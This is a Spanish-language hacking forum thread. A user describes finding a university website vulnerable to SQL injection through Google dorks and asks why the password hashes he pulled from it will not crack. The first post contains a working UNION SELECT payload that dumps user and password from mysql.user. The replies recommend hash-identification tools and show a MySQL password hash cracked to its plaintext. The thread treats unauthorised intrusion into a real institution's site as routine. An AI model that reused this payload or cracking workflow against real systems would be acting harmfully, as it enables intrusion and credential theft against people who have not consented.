|
Título: ¿Porque no se descifra este hash? Publicado por: TheFerret en 1 Septiembre 2015, 12:41 pm Haciendo Google Dorks me encontré esta web de una Universidad vulnerable a SQL INJECTION.
He intentado descifrar los hashes que aparecen pero no lo consigo! No es MD5 o SHA1? http://www.xxx./xxx/noticias.php?id=1947+AND+1=2+UNION+SELECT+0,concat(user,0x3a,password),2+FROM+mysql.user-- Mod: No poner enlaces a paginas vulnerables directamente. Título: Re: ¿Porque no se descifra este hash? Publicado por: el-brujo en 1 Septiembre 2015, 17:07 pm puede ser un hash cifrado, pero seguramente es un hash cifrado con un salt.
Mira con: Si desconoces el tipo de Hash que posees, tienes la opción de poder utilizar un Script que te permite resolver el problema. La herramienta (script) escrita en Python es Hash ID ( Hash Identifier) https://code.google.com/p/hash-identifier/ Versión actualizada de Hash ID: https://github.com/psypanda/hashID Título: Re: ¿Porque no se descifra este hash? Publicado por: Shell Root en 9 Noviembre 2015, 21:18 pm Se supone que el hash que estas sacando es el de MySQL, por ej:
Este hash estoy seguro de que es de MySQL, el hash es el siguiente: Código: *90E462C37378CED12064BB3388827D2BA3A9B689 Cuando trato de crackearlo con las paginas online, me sale lo siguiente: Código: 90e462c37378ced12064bb3388827d2ba3a9b689 MySQL4.1/MySQL5 : biscuit |